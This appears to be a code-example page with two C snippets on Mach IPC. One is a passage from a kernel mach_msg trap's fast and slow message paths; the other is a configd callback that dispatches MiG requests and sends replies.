			if ((--dest_port->ip_srights == 0) &&
			    (dest_port->ip_nsrequest != IP_NULL)) {
				ipc_port_t nsrequest;
				mach_port_mscount_t mscount;

				/* a rather rare case */

				nsrequest = dest_port->ip_nsrequest;
				mscount = dest_port->ip_mscount;
				dest_port->ip_nsrequest = IP_NULL;
				ip_unlock(dest_port);

				ipc_notify_no_senders(nsrequest, mscount);
			} else
				ip_unlock(dest_port);

			if (! ipc_port_flag_protected_payload(dest_port)) {
				kmsg->ikm_header.msgh_bits = MACH_MSGH_BITS(
					MACH_MSG_TYPE_PORT_SEND_ONCE,
					MACH_MSG_TYPE_PORT_SEND);
				kmsg->ikm_header.msgh_local_port = dest_name;
			} else {
				kmsg->ikm_header.msgh_bits = MACH_MSGH_BITS(
					MACH_MSG_TYPE_PORT_SEND_ONCE,
					MACH_MSG_TYPE_PROTECTED_PAYLOAD);
				kmsg->ikm_header.msgh_protected_payload =
					dest_port->ip_protected_payload;
			}
			kmsg->ikm_header.msgh_remote_port = reply_name;
			goto fast_put;

		    abort_request_copyout:
			ip_unlock(dest_port);
			is_write_unlock(space);
			goto slow_copyout;
		    }

		    case MACH_MSGH_BITS(MACH_MSG_TYPE_PORT_SEND_ONCE, 0): {
			mach_port_t dest_name;

			/* receiving a reply message */

			ip_lock(dest_port);
			if (!ip_active(dest_port))
				goto slow_copyout;

			/* optimized ipc_object_copyout_dest */

			assert(dest_port->ip_sorights > 0);

			if (dest_port->ip_receiver == space) {
				ip_release(dest_port);
				dest_port->ip_sorights--;
				dest_name = dest_port->ip_receiver_name;
				ip_unlock(dest_port);
			} else {
				ip_unlock(dest_port);

				ipc_notify_send_once(dest_port);
				dest_name = MACH_PORT_NULL;
			}

			if (! ipc_port_flag_protected_payload(dest_port)) {
				kmsg->ikm_header.msgh_bits = MACH_MSGH_BITS(
					0,
					MACH_MSG_TYPE_PORT_SEND_ONCE);
				kmsg->ikm_header.msgh_local_port = dest_name;
			} else {
				kmsg->ikm_header.msgh_bits = MACH_MSGH_BITS(
					0,
					MACH_MSG_TYPE_PROTECTED_PAYLOAD);
				kmsg->ikm_header.msgh_protected_payload =
					dest_port->ip_protected_payload;
			}
			kmsg->ikm_header.msgh_remote_port = MACH_PORT_NULL;
			goto fast_put;
		    }

		    case MACH_MSGH_BITS_COMPLEX|
			 MACH_MSGH_BITS(MACH_MSG_TYPE_PORT_SEND_ONCE, 0): {
			mach_port_t dest_name;

			/* receiving a complex reply message */

			ip_lock(dest_port);
			if (!ip_active(dest_port))
				goto slow_copyout;

			/* optimized ipc_object_copyout_dest */

			assert(dest_port->ip_sorights > 0);

			if (dest_port->ip_receiver == space) {
				ip_release(dest_port);
				dest_port->ip_sorights--;
				dest_name = dest_port->ip_receiver_name;
				ip_unlock(dest_port);
			} else {
				ip_unlock(dest_port);

				ipc_notify_send_once(dest_port);
				dest_name = MACH_PORT_NULL;
			}

			if (! ipc_port_flag_protected_payload(dest_port)) {
				kmsg->ikm_header.msgh_bits =
					MACH_MSGH_BITS_COMPLEX
					| MACH_MSGH_BITS(
						0,
						MACH_MSG_TYPE_PORT_SEND_ONCE);
				kmsg->ikm_header.msgh_local_port = dest_name;
			} else {
				kmsg->ikm_header.msgh_bits =
					MACH_MSGH_BITS_COMPLEX
					| MACH_MSGH_BITS(
					    0,
					    MACH_MSG_TYPE_PROTECTED_PAYLOAD);
				kmsg->ikm_header.msgh_protected_payload =
					dest_port->ip_protected_payload;
			}
			kmsg->ikm_header.msgh_remote_port = MACH_PORT_NULL;

			mr = ipc_kmsg_copyout_body(
				(vm_offset_t) (&kmsg->ikm_header + 1),
				(vm_offset_t) &kmsg->ikm_header
					+ kmsg->ikm_header.msgh_size,
				space,
				current_map());

			if (mr != MACH_MSG_SUCCESS) {
				(void) ipc_kmsg_put(msg, kmsg,
					kmsg->ikm_header.msgh_size);
				return mr | MACH_RCV_BODY_ERROR;
			}
			goto fast_put;
		    }

		    default:
			goto slow_copyout;
		}
		/*NOTREACHED*/

	    fast_put:
		/*
		 *	We have the reply message data in kmsg,
		 *	and the reply message size in reply_size.
		 *	Just need to copy it out to the user and free kmsg.
		 *	We must check ikm_cache after copyoutmsg.
		 */

		ikm_check_initialized(kmsg, kmsg->ikm_size);

		if ((kmsg->ikm_size != IKM_SAVED_KMSG_SIZE) ||
		    copyoutmsg(&kmsg->ikm_header, msg,
			       reply_size) ||
		    (ikm_cache() != IKM_NULL))
			goto slow_put;

		ikm_cache() = kmsg;
		thread_syscall_return(MACH_MSG_SUCCESS);
		/*NOTREACHED*/
		return MACH_MSG_SUCCESS; /* help for the compiler */

		/*
		 *	The slow path has a few non-register temporary
		 *	variables used only for call-by-reference.
		 */

	    {
		ipc_kmsg_t temp_kmsg;
		mach_port_seqno_t temp_seqno;
		ipc_object_t temp_rcv_object;
		ipc_mqueue_t temp_rcv_mqueue;

	    slow_get:
		/*
		 *	No locks, references, or messages held.
		 *	Still have to get the request, send it,
		 *	receive reply, etc.
		 */

		mr = ipc_kmsg_get(msg, send_size, &temp_kmsg);
		if (mr != MACH_MSG_SUCCESS) {
			thread_syscall_return(mr);
			/*NOTREACHED*/
		}
		kmsg = temp_kmsg;

		/* try to get back on optimized path */
		goto fast_copyin;

	    slow_copyin:
		/*
		 *	We have the message data in kmsg, but
		 *	we still need to copyin, send it,
		 *	receive a reply, and do copyout.
		 */

		mr = ipc_kmsg_copyin(kmsg, space, current_map(),
				     MACH_PORT_NULL);
		if (mr != MACH_MSG_SUCCESS) {
			ikm_free(kmsg);
			thread_syscall_return(mr);
			/*NOTREACHED*/
		}

		/* try to get back on optimized path */

		if (kmsg->ikm_header.msgh_bits & MACH_MSGH_BITS_CIRCULAR)
			goto slow_send;

		dest_port = (ipc_port_t) kmsg->ikm_header.msgh_remote_port;
		assert(IP_VALID(dest_port));

		ip_lock(dest_port);
		if (dest_port->ip_receiver == ipc_space_kernel) {
			assert(ip_active(dest_port));
			ip_unlock(dest_port);
			goto kernel_send;
		}

		if (ip_active(dest_port) &&
		    ((dest_port->ip_msgcount < dest_port->ip_qlimit) ||
		     (MACH_MSGH_BITS_REMOTE(kmsg->ikm_header.msgh_bits) ==
					MACH_MSG_TYPE_PORT_SEND_ONCE)))
		{
		    /*
		     *	Try an optimized ipc_mqueue_copyin.
		     *	It will work if this is a request message.
		     */

		    ipc_port_t reply_port;

		    reply_port = (ipc_port_t)
					kmsg->ikm_header.msgh_local_port;
		    if (IP_VALID(reply_port)) {
			if (ip_lock_try(reply_port)) {
			    if (ip_active(reply_port) &&
				reply_port->ip_receiver == space &&
				reply_port->ip_receiver_name == rcv_name &&
				reply_port->ip_pset == IPS_NULL)
			    {
				/* Grab a reference to the reply port. */
				rcv_object = (ipc_object_t) reply_port;
				io_reference(rcv_object);
				rcv_mqueue = &reply_port->ip_messages;
				imq_lock(rcv_mqueue);
				io_unlock(rcv_object);
				goto fast_send_receive;
			    }
			    ip_unlock(reply_port);
			}
		    }
		}

		ip_unlock(dest_port);
		goto slow_send;

	    kernel_send:
		/*
		 *	Special case: send message to kernel services.
		 *	The request message has been copied into the
		 *	kmsg.  Nothing is locked.
		 */

	    {
		ipc_port_t	reply_port;

		/*
		 * Perform the kernel function.
		 */

		kmsg = ipc_kobject_server(kmsg);
		if (kmsg == IKM_NULL) {
			/*
			 * No reply.  Take the
			 * slow receive path.
			 */
			goto slow_get_rcv_port;
		}

		/*
		 * Check that:
		 *	the reply port is alive
		 *	we hold the receive right
		 *	the name has not changed.
		 *	the port is not in a set
		 * If any of these are not true,
		 * we cannot directly receive the reply
		 * message.
		 */
		reply_port = (ipc_port_t) kmsg->ikm_header.msgh_remote_port;
		ip_lock(reply_port);

		if ((!ip_active(reply_port)) ||
		    (reply_port->ip_receiver != space) ||
		    (reply_port->ip_receiver_name != rcv_name) ||
		    (reply_port->ip_pset != IPS_NULL))
		{
			ip_unlock(reply_port);
			ipc_mqueue_send_always(kmsg);
			goto slow_get_rcv_port;
		}

		rcv_mqueue = &reply_port->ip_messages;
		imq_lock(rcv_mqueue);
		/* keep port locked, and don`t change ref count yet */

		/*
		 * If there are messages on the port
		 * or other threads waiting for a message,
		 * we cannot directly receive the reply.
		 */
		if ((ipc_thread_queue_first(&rcv_mqueue->imq_threads)
			!= ITH_NULL) ||
		    (ipc_kmsg_queue_first(&rcv_mqueue->imq_messages)
			!= IKM_NULL))
		{
			imq_unlock(rcv_mqueue);
			ip_unlock(reply_port);
			ipc_mqueue_send_always(kmsg);
			goto slow_get_rcv_port;
		}

		/*
		 * We can directly receive this reply.
		 * Since the kernel reply never blocks,
		 * it holds no message_accepted request.
		 * Since there were no messages queued
		 * on the reply port, there should be
		 * no threads blocked waiting to send.
		 */

		assert(kmsg->ikm_marequest == IMAR_NULL);
		assert(ipc_thread_queue_first(&reply_port->ip_blocked)
				== ITH_NULL);

		dest_port = reply_port;
		kmsg->ikm_header.msgh_seqno = dest_port->ip_seqno++;
		imq_unlock(rcv_mqueue);

		/*
		 * inline ipc_object_release.
		 * Port is still locked.
		 * Reference count was not incremented.
		 */
		ip_check_unlock(reply_port);

		/* copy out the kernel reply */
		goto fast_copyout;
	    }

	    slow_send:
		/*
		 *	Nothing is locked.  We have acquired kmsg, but
		 *	we still need to send it and receive a reply.
		 */

		mr = ipc_mqueue_send(kmsg, MACH_MSG_OPTION_NONE,
				     MACH_MSG_TIMEOUT_NONE);
		if (mr != MACH_MSG_SUCCESS) {
			mr |= ipc_kmsg_copyout_pseudo(kmsg, space,
						      current_map());

			assert(kmsg->ikm_marequest == IMAR_NULL);
			(void) ipc_kmsg_put(msg, kmsg,
					    kmsg->ikm_header.msgh_size);
			thread_syscall_return(mr);
			/*NOTREACHED*/
		}

	    slow_get_rcv_port:
		/*
		 * We have sent the message.  Copy in the receive port.
		 */
		mr = ipc_mqueue_copyin(space, rcv_name,
				       &temp_rcv_mqueue, &temp_rcv_object);
		if (mr != MACH_MSG_SUCCESS) {
			thread_syscall_return(mr);
			/*NOTREACHED*/
		}
		rcv_mqueue = temp_rcv_mqueue;
		rcv_object = temp_rcv_object;
		/* hold ref for rcv_object; rcv_mqueue is locked */

	/*
	    slow_receive:
	*/
		/*
		 *	Now we have sent the request and copied in rcv_name,
		 *	so rcv_mqueue is locked and hold ref for rcv_object.
		 *	Just receive a reply and try to get back to fast path.
		 *
		 *	ipc_mqueue_receive may not return, because if we block
		 *	then our kernel stack may be discarded.  So we save
		 *	state here for mach_msg_continue to pick up.
		 */

		self->ith_msg = msg;
		self->ith_rcv_size = rcv_size;
		self->ith_object = rcv_object;
		self->ith_mqueue = rcv_mqueue;

		mr = ipc_mqueue_receive(rcv_mqueue,
					MACH_MSG_OPTION_NONE,
					MACH_MSG_SIZE_MAX,
					MACH_MSG_TIMEOUT_NONE,
					FALSE, mach_msg_continue,
		       			&temp_kmsg, &temp_seqno);
		/* rcv_mqueue is unlocked */
		ipc_object_release(rcv_object);
		if (mr != MACH_MSG_SUCCESS) {
			thread_syscall_return(mr);
			/*NOTREACHED*/
		}

		(kmsg = temp_kmsg)->ikm_header.msgh_seqno = temp_seqno;
		dest_port = (ipc_port_t) kmsg->ikm_header.msgh_remote_port;
		goto fast_copyout;

	    slow_copyout:
		/*
		 *	Nothing locked and no references held, except
		 *	we have kmsg with msgh_seqno filled in.  Must
		 *	still check against rcv_size and do
		 *	ipc_kmsg_copyout/ipc_kmsg_put.
		 */

		reply_size = kmsg->ikm_header.msgh_size;
		if (rcv_size < reply_size) {
			ipc_kmsg_copyout_dest(kmsg, space);
			(void) ipc_kmsg_put(msg, kmsg, sizeof *msg);
			thread_syscall_return(MACH_RCV_TOO_LARGE);
			/*NOTREACHED*/
		}

		mr = ipc_kmsg_copyout(kmsg, space, current_map(),
				      MACH_PORT_NULL);
		if (mr != MACH_MSG_SUCCESS) {
			if ((mr &~ MACH_MSG_MASK) == MACH_RCV_BODY_ERROR) {
				(void) ipc_kmsg_put(msg, kmsg,
						kmsg->ikm_header.msgh_size);
			} else {
				ipc_kmsg_copyout_dest(kmsg, space);
				(void) ipc_kmsg_put(msg, kmsg, sizeof *msg);
			}

			thread_syscall_return(mr);
			/*NOTREACHED*/
		}

		/* try to get back on optimized path */

		goto fast_put;

	    slow_put:
		mr = ipc_kmsg_put(msg, kmsg, reply_size);
		thread_syscall_return(mr);
		/*NOTREACHED*/
	    }
	} else if (option == MACH_SEND_MSG) {
		ipc_space_t space = current_space();
		vm_map_t map = current_map();
		ipc_kmsg_t kmsg;

		mr = ipc_kmsg_get(msg, send_size, &kmsg);
		if (mr != MACH_MSG_SUCCESS)
			return mr;

		mr = ipc_kmsg_copyin(kmsg, space, map, MACH_PORT_NULL);
		if (mr != MACH_MSG_SUCCESS) {
			ikm_free(kmsg);
			return mr;
		}

		mr = ipc_mqueue_send(kmsg, MACH_MSG_OPTION_NONE,
				     MACH_MSG_TIMEOUT_NONE);
		if (mr != MACH_MSG_SUCCESS) {
			mr |= ipc_kmsg_copyout_pseudo(kmsg, space, map);

			assert(kmsg->ikm_marequest == IMAR_NULL);
			(void) ipc_kmsg_put(msg, kmsg,
					    kmsg->ikm_header.msgh_size);
		}

		return mr;
	} else if (option == MACH_RCV_MSG) {
		ipc_thread_t self = current_thread();
		ipc_space_t space = current_space();
		vm_map_t map = current_map();
		ipc_object_t object;
		ipc_mqueue_t mqueue;
		ipc_kmsg_t kmsg;
		mach_port_seqno_t seqno;

		mr = ipc_mqueue_copyin(space, rcv_name, &mqueue, &object);
		if (mr != MACH_MSG_SUCCESS)
			return mr;
		/* hold ref for object; mqueue is locked */

		/*
		 *	ipc_mqueue_receive may not return, because if we block
		 *	then our kernel stack may be discarded.  So we save
		 *	state here for mach_msg_continue to pick up.
		 */

		self->ith_msg = msg;
		self->ith_rcv_size = rcv_size;
		self->ith_object = object;
		self->ith_mqueue = mqueue;

		mr = ipc_mqueue_receive(mqueue,
					MACH_MSG_OPTION_NONE,
					MACH_MSG_SIZE_MAX,
					MACH_MSG_TIMEOUT_NONE,
					FALSE, mach_msg_continue,
					&kmsg, &seqno);
		/* mqueue is unlocked */
		ipc_object_release(object);
		if (mr != MACH_MSG_SUCCESS)
			return mr;

		kmsg->ikm_header.msgh_seqno = seqno;
		if (rcv_size < kmsg->ikm_header.msgh_size) {
			ipc_kmsg_copyout_dest(kmsg, space);
			(void) ipc_kmsg_put(msg, kmsg, sizeof *msg);
			return MACH_RCV_TOO_LARGE;
		}

		mr = ipc_kmsg_copyout(kmsg, space, map, MACH_PORT_NULL);
		if (mr != MACH_MSG_SUCCESS) {
			if ((mr &~ MACH_MSG_MASK) == MACH_RCV_BODY_ERROR) {
				(void) ipc_kmsg_put(msg, kmsg,
						kmsg->ikm_header.msgh_size);
			} else {
				ipc_kmsg_copyout_dest(kmsg, space);
				(void) ipc_kmsg_put(msg, kmsg, sizeof *msg);
			}

			return mr;
		}

		return ipc_kmsg_put(msg, kmsg, kmsg->ikm_header.msgh_size);
	} else if (option == MACH_MSG_OPTION_NONE) {
		/*
		 *	We can measure the "null mach_msg_trap"
		 *	(syscall entry and thread_syscall_return exit)
		 *	with this path.
		 */

		thread_syscall_return(MACH_MSG_SUCCESS);
		/*NOTREACHED*/
	}

	if (option & MACH_SEND_MSG) {
		mr = mach_msg_send(msg, option, send_size,
				   time_out, notify);
		if (mr != MACH_MSG_SUCCESS)
			return mr;
	}

	if (option & MACH_RCV_MSG) {
		mr = mach_msg_receive(msg, option, rcv_size, rcv_name,
				      time_out, notify);
		if (mr != MACH_MSG_SUCCESS)
			return mr;
	}

	return MACH_MSG_SUCCESS;
}
Esempio n. 30
0
__private_extern__
void
configdCallback(CFMachPortRef port, void *msg, CFIndex size, void *info)
{
	mig_reply_error_t *	bufRequest	= msg;
	uint32_t		bufReply_q[MACH_MSG_BUFFER_SIZE/sizeof(uint32_t)];
	mig_reply_error_t *	bufReply	= (mig_reply_error_t *)bufReply_q;
	static CFIndex		bufSize		= 0;
	mach_msg_return_t	mr;
	int			options;

	if (bufSize == 0) {
		// get max size for MiG reply buffers
		bufSize = _config_subsystem.maxsize;

		// check if our on-the-stack reply buffer will be big enough
		if (bufSize > sizeof(bufReply_q)) {
			SCLog(TRUE, LOG_NOTICE,
			      CFSTR("configdCallback(): buffer size should be increased > %d"),
			      _config_subsystem.maxsize);
		}
	}

	if (bufSize > sizeof(bufReply_q)) {
		bufReply = CFAllocatorAllocate(NULL, _config_subsystem.maxsize, 0);
	}
	bufReply->RetCode = 0;

	/* we have a request message */
	(void) config_demux(&bufRequest->Head, &bufReply->Head);

	if (!(bufReply->Head.msgh_bits & MACH_MSGH_BITS_COMPLEX)) {
		if (bufReply->RetCode == MIG_NO_REPLY) {
			bufReply->Head.msgh_remote_port = MACH_PORT_NULL;
		} else if ((bufReply->RetCode != KERN_SUCCESS) &&
			   (bufRequest->Head.msgh_bits & MACH_MSGH_BITS_COMPLEX)) {
			/*
			 * destroy the request - but not the reply port
			 */
			bufRequest->Head.msgh_remote_port = MACH_PORT_NULL;
			mach_msg_destroy(&bufRequest->Head);
		}
	}

	if (bufReply->Head.msgh_remote_port != MACH_PORT_NULL) {
		/*
		 * send reply.
		 *
		 * We don't want to block indefinitely because the client
		 * isn't receiving messages from the reply port.
		 * If we have a send-once right for the reply port, then
		 * this isn't a concern because the send won't block.
		 * If we have a send right, we need to use MACH_SEND_TIMEOUT.
		 * To avoid falling off the kernel's fast RPC path unnecessarily,
		 * we only supply MACH_SEND_TIMEOUT when absolutely necessary.
		 */

		options = MACH_SEND_MSG;
		if (MACH_MSGH_BITS_REMOTE(bufReply->Head.msgh_bits) != MACH_MSG_TYPE_MOVE_SEND_ONCE) {
			options |= MACH_SEND_TIMEOUT;
		}
		mr = mach_msg(&bufReply->Head,		/* msg */
			      options,			/* option */
			      bufReply->Head.msgh_size,	/* send_size */
			      0,			/* rcv_size */
			      MACH_PORT_NULL,		/* rcv_name */
			      MACH_MSG_TIMEOUT_NONE,	/* timeout */
			      MACH_PORT_NULL);		/* notify */

		/* Has a message error occurred? */
		switch (mr) {
			case MACH_SEND_INVALID_DEST:
			case MACH_SEND_TIMED_OUT:
				break;
			default :
				/* Includes success case.  */
				goto done;
		}
	}

	if (bufReply->Head.msgh_bits & MACH_MSGH_BITS_COMPLEX) {
		mach_msg_destroy(&bufReply->Head);
	}

    done :

	if (bufReply != (mig_reply_error_t *)bufReply_q)
		CFAllocatorDeallocate(NULL, bufReply);
	return;
}